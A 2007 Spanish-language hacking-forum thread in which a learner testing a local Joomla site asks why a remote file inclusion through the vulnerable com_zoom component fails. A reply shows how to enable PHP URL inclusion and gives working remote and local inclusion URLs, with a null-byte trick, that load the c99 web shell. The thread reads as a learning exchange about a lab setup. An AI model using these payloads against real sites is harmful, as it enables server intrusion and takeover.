elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 15:38  


Tema destacado: Únete al Grupo Steam elhacker.NET

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Problemas con mosConfig_absolute_path
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problemas con mosConfig_absolute_path  (Leído 3,153 veces)
astropajo

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Problemas con mosConfig_absolute_path
« en: 9 Octubre 2007, 13:12 »

Muy buenas a todos!

Estoy intentando aprender esto de las vulnerabilidades y los exploit, para lo que he hecho una página web a nivel local (en mi ordenador) y así poder atacarla y aprender.

La página está en joomla y he instalado componentes con vulnerabilidades, como com_zoom. He intentado pasarle el mosConfig_absolute_path como parámetro redirigido al c99.txt, tb colgado a nivel local, pero cuando pongo:

http://localhost/prueba/components/com_zoom/lib/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://localhost/c99/c99.txt?

me da 2 Warnings, uno en readdir y otro en closedir

Lo he depurado con Nusphere y mosConfig_absolute_path está undefined, aunque sí aparece dentro de $_GET.

Alguien me puede arrojar un poco de luz?

Muchas gracias!
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Problemas con mosConfig_absolute_path
« Respuesta #1 en: 9 Octubre 2007, 16:19 »

Posiblemente sea por que la configuración de tu PHP ha sido designada para que no se pueda realizar inclusiones externas.

Para permitir este tipo de inclusiones deberás activar dos cláusulas en el archivo de configuración de tu PHP (php.ini). En el sistema operativo Microsoft Windows XP, este archivo de configuración, se encuentra por defecto dentro de la carpeta WINDOWS (%windir%).

Código:
allow_url_fopen=on
allow_url_include=on

Para que los cambios realizados surjan efecto, deberás reiniciar el servidor WEB. En los servidores Apache, por ejemplo, tan solo deberás introducir lo siguiente en la línea de comandos (Inicio - Ejecutar):

Código:
httpd.exe -k restart

Si lo prefieres también puedes reiniciar tu ordenador...

Una vez realizado todo lo anterior podrás realizar inclusiones externas.

Código:
http://localhost/prueba/components/com_zoom/lib/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://localhost/c99/c99.txt?

También decirte que es posible realizar inclusiones locales sin la necesidad de reconfigurar el servidor, solo que deberás conocer la ruta, incluyendo la raíz de la unidad, de la carpeta dónde se encuentran alojados los archivos que serán llamados desde el exterior. Generalmente la carpeta se suele llamar WWW o quizás algún derivado de éste.

Imaginemos que la carpeta donde se encuentran estos archivos es C:\AppServ\WWW y el archivo, en cuestión, que incrustaremos es c99.txt, el cual se encuentra en el interior de la carpeta que nombré anteriormente. Al unir las dos cadenas obtendremos la siguiente ruta C:\AppServ\WWW\c99.txt.

Código:
http://localhost/prueba/components/com_zoom/lib/iptc/EXIF_Makernote.php?mosConfig_absolute_path=C:\AppServ\WWW\c99.txt%00

Como verás, al final de la dirección he añadido %00, esto es para indicar que ese es el final de la variable mosConfig_absolute_path.

PD: La mayor parte de la explicación está centrada en sistemas operativos Windows, pero también puede ser funcional con otros sistemas.
En línea
astropajo

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Problemas con mosConfig_absolute_path
« Respuesta #2 en: 11 Octubre 2007, 23:47 »

Muchas gracias por contestar!

Voy a probar lo que me dices y ya iré contando mis evoluciones y mis dudas

Hasta otra
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines